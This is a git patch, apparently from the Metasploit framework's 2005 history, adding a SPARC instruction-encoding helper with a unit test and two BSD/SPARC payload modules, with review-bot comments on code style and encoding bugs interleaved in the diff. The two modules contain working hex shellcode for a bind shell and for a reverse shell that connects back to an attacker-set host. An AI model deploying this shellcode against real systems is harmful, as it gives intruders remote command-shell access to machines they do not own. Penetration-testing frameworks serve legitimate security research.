From efc02cfd89ad0da1ed8fbd149b2ec6a8de206908 Mon Sep 17 00:00:00 2001
From: Matt Miller
Date: Tue, 11 Oct 2005 22:37:41 +0000
Subject: [PATCH] sparc payloads, untested
git-svn-id: file:///home/svn/incoming/trunk@2963 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/rex/arch.rb | 1 +
 lib/rex/arch/sparc.rb | 61 +++++++++++++++++++
 lib/rex/arch/sparc.rb.ut.rb | 18 ++++++
 .../singles/bsd/sparc/shell_bind_tcp.rb | 46 ++++++++++++++
 .../singles/bsd/sparc/shell_reverse_tcp.rb | 47 ++++++++++++++
 5 files changed, 173 insertions(+)
 create mode 100644 lib/rex/arch/sparc.rb
 create mode 100644 lib/rex/arch/sparc.rb.ut.rb
 create mode 100644 modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb
diff --git a/lib/rex/arch.rb b/lib/rex/arch.rb
index 7b4bf101fa..9ea72436eb 100644
--- a/lib/rex/arch.rb
+++ b/lib/rex/arch.rb
@@ -2,6 +2,7 @@ module Rex
 module Arch
 
 require 'rex/arch/x86'
+ require 'rex/arch/sparc'
 
 #
 # This routine adjusts the stack pointer for a given architecture
diff --git a/lib/rex/arch/sparc.rb b/lib/rex/arch/sparc.rb
new file mode 100644
index 0000000000..70ed5915d6
--- /dev/null
+++ b/lib/rex/arch/sparc.rb
@@ -0,0 +1,61 @@
+#!/usr/bin/ruby
+
+module Rex
+module Arch
+
+#
+# Everything here is mostly stolen from vlad's perl x86 stuff
+#
+module Sparc
+
+ #
+ # Register number constants
+ #
+ RegisterNumber =
+ {
+ 'g0' => 0, 'g1' => 1, 'g2' => 2, 'g3' => 3,
+ 'g4' => 4, 'g5' => 5, 'g6' => 6, 'g7' => 7,
+ 'o0' => 8, 'o1' => 9, 'o2' => 10, 'o3' => 11,
+ 'o4' => 12, 'o5' => 13, 'o6' => 14, 'o7' => 15,
+ 'l0' => 16, 'l1' => 17, 'l2' => 18, 'l3' => 19,
+ 'l4' => 20, 'l5' => 21, 'l6' => 22, 'l7' => 23,
+ 'i0' => 24, 'i1' => 25, 'i2' => 26, 'i3' => 27,
+ 'i4' => 28, 'i5' => 29, 'i6' => 30, 'i7' => 31,
+ }
+
+ def self.sethi(constant, dst)
+ [
+ (RegisterNumber[dst] << 25) |
+ (4 << 22) |
+ (constant >> 10)
+ ].pack('N')
+ end
+
+ def self.ori(src, constant, dst)
+ [
+ (2 << 30) |
+ (RegisterNumber[dst] << 25) |
+ (2 << 19) |
+ (RegisterNumber[src] << 14) |
+ (1 << 13) |
+ (constant & 0x1fff)
+ ].pack('N')
+ end
+
+ def self.set(constant, dst)
+ if (constant <= 4096 and constant >= 0)
+ ori('g0', constant, dst)
+ elsif (constant & 0x3ff)
+ set_dword(constant, dst)
+ else
+ sethi(constant, dst)
+ end
+ end
+
+ def self.set_dword(constant, dst)
+ sethi(constant, dst)
+ ori(dst, constant & 0x3ff, dst)
+ end
+
+end
+
+end end
diff --git a/lib/rex/arch/sparc.rb.ut.rb b/lib/rex/arch/sparc.rb.ut.rb
new file mode 100644
index 0000000000..43e1a17012
--- /dev/null
+++ b/lib/rex/arch/sparc.rb.ut.rb
@@ -0,0 +1,18 @@
+#!/usr/bin/ruby
+
+$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
+
+require 'test/unit'
+require 'rex/string_utils'
+require 'rex/arch/sparc'
+
+class Rex::Arch::Sparc::UnitTest < ::Test::Unit::TestCase
+
+ Klass = Rex::Arch::Sparc
+
+ def test_set
+ assert_equal("\x88\x10\x20\x02", Klass.set(0x2, 'g4'))
+ assert_equal("\x09\x00\x00\x08\x88\x11\x22\x22", Klass.set(0x2222, 'g4'))
+ end
+
+end
diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb
new file mode 100644
index 0000000000..564a8cfa3d
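Review bot: In `set`, the `elsif (constant & 0x3ff)` test is always taken because Ruby treats 0 as truthy, so the `else` branch that emits a lone `sethi` is unreachable and a constant with zero low ten bits still costs two instructions; it should read `elsif (constant & 0x3ff) != 0`. The first branch's upper bound is off by one as well: `ori` packs the value into a 13-bit immediate that SPARC sign-extends, so 4096 (0x1000) would load as -4096 — use `if constant >= 0 && constant < 4096`. `RegisterNumber[dst]` returns nil for an unknown register name and the failure then surfaces as a NoMethodError on `<< 25`; `RegisterNumber.fetch(dst)` would report the bad name instead. A one-line comment on `set_dword` saying that `sethi` fills bits 31..10 and `ori` supplies the remaining ten would spare the next reader the bit arithmetic.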
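Review bot: `test_set` only covers the single-`ori` path and the `sethi`+`ori` path, so neither the 4095/4096 boundary of the first branch nor the `sethi`-only branch of `set` is pinned by a test. Adding an assertion for a constant whose low ten bits are zero (for example `Klass.set(0x1000, 'g4')`) and one on each side of the boundary would document which encoding `set` is expected to emit there; the expected bytes can be derived by hand the same way the two existing ones were.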
--- /dev/null
+++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb
@@ -0,0 +1,46 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Bsd
+module Sparc
+
+module ShellBindTcp
+
+ include Msf::Payload::Single
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'BSD Command Shell, Bind TCP Inline',
+ 'Version' => '$Revision$',
+ 'Description' => 'Listen for a connection and spawn a command shell',
+ 'Author' => 'vlad902',
+ 'Platform' => 'bsd',
+ 'Arch' => ARCH_SPARC,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShell))
+ end
+
+ def generate
+ port = (datastore['RPORT'] || 0).to_i
+ payload =
+ "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02" +
+ "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8" +
+ Rex::Arch::Sparc.set(0xff020000 | port, "l0") +
+ "\xe0\x23\xbf\xf0\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10" +
+ "\x82\x10\x20\x68\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01" +
+ "\x82\x10\x20\x6a\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09" +
+ "\x94\x12\x40\x09\x82\x10\x20\x1e\x91\xd0\x20\x08\xd0\x23\xbf\xf8" +
+ "\x92\x10\x20\x03\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08" +
+ "\x12\xbf\xff\xfd\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a" +
+ "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08" +
+ "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" +
+ "\x91\xd0\x20\x08"
+ end
+
+end
+
+end end end end end
diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..c43ba0e126
--- /dev/null
+++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb
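Review bot: In `generate`, the local `payload` is assigned and never read; the method returns the bytes only because the assignment happens to be its last expression, which reads as if a step were missing. Either drop the `payload =` line and let the concatenation stand as the return value, or finish the method with an explicit `payload`. The same pattern appears in `generate` of shell_reverse_tcp.rb in the next hunk. A short comment above the first string literal naming the helper each fixed chunk belongs to (the part before the `Rex::Arch::Sparc.set` call and the part after it) would make the module maintainable without disassembling it.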
@@ -0,0 +1,47 @@
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Bsd
+module Sparc
+
+module ShellReverseTcp
+
+ include Msf::Payload::Single
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'BSD Command Shell, Reverse TCP Inline',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect back to attacker and spawn a command shell',
+ 'Author' => 'vlad902',
+ 'Platform' => 'bsd',
+ 'Arch' => ARCH_SPARC,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShell
+ ))
+ end
+
+ def generate
+ port = (datastore['RPORT'] || '0').to_i
+ host = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1')
+
+ payload =
+ "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02" +
+ "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x92\x10\x20\x03" +
+ "\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08\x12\xbf\xff\xfd" +
+ "\xd0\x03\xbf\xf8" +
+ Rex::Arch::Sparc.set(0xff020000 | port, "l0") +
+ Rex::Arch::Sparc.set(host, "l1") +
+ "\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\x62" +
+ "\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" +
+ "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" +
+ "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
+ end
+
+end
+
+end end end end end
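Review bot: `generate` defaults `RPORT` with `|| '0'` whereas the sibling shell_bind_tcp.rb uses `|| 0`; both become 0 after `.to_i`, but the two modules should spell it the same way, and `.to_i` silently maps any non-numeric datastore value to 0 where `Integer(datastore['RPORT'] || 0)` would raise on garbage. The `))` closing `merge_info` on its own line after `'Session' => ...` also differs from the bind module, which closes on the same line; pick one layout for the pair.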